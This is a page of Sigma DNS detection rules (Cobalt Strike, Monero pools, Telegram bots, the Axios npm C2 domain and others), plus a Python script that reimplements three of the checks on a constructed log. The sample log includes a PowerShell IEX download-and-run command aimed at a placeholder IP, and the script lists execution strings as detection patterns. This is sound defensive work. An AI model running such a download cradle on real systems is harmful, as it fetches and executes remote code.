Sigma Rules
11 rules found
DNS Query to External Service Interaction Domains
Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
Cobalt Strike DNS Beaconing
Detects suspicious DNS queries known from Cobalt Strike beacons
Monero Crypto Coin Mining Pool Lookup
Detects suspicious DNS queries to Monero mining pools
Suspicious DNS Query with B64 Encoded String
Detects suspicious DNS queries containing base64-encoded strings
Telegram Bot API Request
Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind
DNS TXT Answer with Possible Execution Strings
Detects strings commonly used for command execution in DNS TXT answers
Wannacry Killswitch Domain
Detects DNS queries for the WannaCry killswitch domain
Potential Operation Triangulation C2 Beaconing Activity - DNS
Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB
DNS Query To Katz Stealer Domains - Network
Detects DNS queries to domains associated with Katz Stealer malware. Katz Stealer is an information-stealing malware family that exfiltrates sensitive data from compromised systems. In enterprise environments, DNS queries to these domains may indicate malicious activity or compromise.
Axios NPM Compromise Malicious C2 Domain DNS Query
Detects DNS queries for the malicious C2 domain associated with the plain-crypto-js/Axios npm package supply chain compromise. On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) whose postinstall script acted as a cross-platform RAT dropper. This rule flags endpoints attempting to resolve the attacker's C2 domain (sfrclak.com) used for command and control.
Low Reputation Effective Top-Level Domain (eTLD)
Detects DNS queries to domains within known low reputation eTLDs. This rule uses AlphaSOC's threat intelligence data and is updated on a monthly basis.
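The rules above are Sigma YAML evaluated by a SIEM, but the three detection patterns they rely on (match against a list of known bad domains, flag base64-looking labels in a query name, flag execution strings in a TXT answer) are easy to reproduce stand-alone. The following is an added example, not code from the Sigma project or any of the rules listed here. It assumes a newline-delimited JSON DNS log with fields `ts`, `src`, `qname`, `qtype` and, for answers, `answer`; the sample lines are constructed. The only domains it knows are the two named on this page (api.telegram.org and sfrclak.com); the execution-string list and the base64 heuristic are my own approximations, not the rules' actual selectors.

```python
import base64
import json
import re

# Domains named on this page, mapped to the rule title they correspond to.
# Subdomains match as well (assumption: the real rules use endswith-style matching).
KNOWN_DOMAINS = {
    "api.telegram.org": "Telegram Bot API Request",
    "sfrclak.com": "Axios NPM Compromise Malicious C2 Domain DNS Query",
}

# Assumed execution strings for TXT answers; not the actual rule's list.
TXT_EXEC_STRINGS = ("iex(", "invoke-expression", "powershell", "cmd.exe",
                    "/c ", "bash -c", "curl ", "wget ")

# A label of 16+ base64 / base64url characters with optional padding.
B64_LABEL = re.compile(r"^[A-Za-z0-9+/_-]{16,}={0,2}$")

# Constructed sample log (documentation IP ranges; not real traffic).
SAMPLE_LOG = """\
{"ts":"2024-05-01T10:00:01Z","src":"10.0.0.12","qname":"www.example.com","qtype":"A"}
{"ts":"2024-05-01T10:00:02Z","src":"10.0.0.12","qname":"api.telegram.org","qtype":"A"}
{"ts":"2024-05-01T10:00:03Z","src":"10.0.0.15","qname":"U2VjcmV0RGF0YUhlcmU.exfil.example","qtype":"A"}
{"ts":"2024-05-01T10:00:04Z","src":"10.0.0.15","qname":"cdn.sfrclak.com","qtype":"A"}
{"ts":"2024-05-01T10:00:05Z","src":"10.0.0.20","qname":"downloads-cdn-eu-west.example.net","qtype":"A"}
{"ts":"2024-05-01T10:00:06Z","src":"10.0.0.20","qname":"t.example.org","qtype":"TXT","answer":"v=spf1 include:_spf.example.org -all"}
{"ts":"2024-05-01T10:00:07Z","src":"10.0.0.21","qname":"c.example.org","qtype":"TXT","answer":"powershell -nop -w hidden -c IEX((new-object net.webclient).downloadstring('http://198.51.100.7/a'))"}
"""


def is_known_domain(qname):
    """Return the rule title if qname is, or is under, a listed domain."""
    name = qname.rstrip(".").lower()
    for domain, rule in KNOWN_DOMAINS.items():
        if name == domain or name.endswith("." + domain):
            return rule
    return None


def looks_base64(label):
    """Heuristic: long base64 charset label with mixed case and digits that decodes.

    The case/digit requirement is what keeps ordinary long hostnames such as
    'downloads-cdn-eu-west' from firing; it is a precision trade-off, not a proof.
    """
    if not B64_LABEL.match(label):
        return False
    if not (re.search(r"[a-z]", label) and re.search(r"[A-Z]", label)
            and re.search(r"[0-9]", label)):
        return False
    body = label.replace("-", "+").replace("_", "/")
    body += "=" * (-len(body) % 4)  # DNS exfil tools usually strip padding
    try:
        base64.b64decode(body, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return True


def txt_exec_strings(answer):
    """Return the execution-related substrings present in a TXT answer."""
    lowered = answer.lower()
    return [s for s in TXT_EXEC_STRINGS if s in lowered]


def detect(log_text):
    """Run all three checks over NDJSON DNS events; return (src, rule, detail) tuples."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        qname = ev["qname"]

        rule = is_known_domain(qname)
        if rule:
            alerts.append((ev["src"], rule, qname))

        if any(looks_base64(label) for label in qname.rstrip(".").split(".")):
            alerts.append((ev["src"], "Suspicious DNS Query with B64 Encoded String", qname))

        if ev.get("qtype") == "TXT" and "answer" in ev:
            hits = txt_exec_strings(ev["answer"])
            if hits:
                alerts.append((ev["src"], "DNS TXT Answer with Possible Execution Strings",
                               ",".join(hits)))
    return alerts


if __name__ == "__main__":
    for src, rule, detail in detect(SAMPLE_LOG):
        print(f"{src}\t{rule}\t{detail}")
```

Running it against the constructed log yields four alerts: the Telegram lookup, the base64 label under exfil.example, the sfrclak.com subdomain, and the TXT answer carrying `IEX(` and `powershell`; the SPF record and the long but lowercase CDN hostname stay quiet. The base64 check in particular is a heuristic and will need tuning (or an allow-list of CDN and tracking domains) before it is usable at enterprise query volumes.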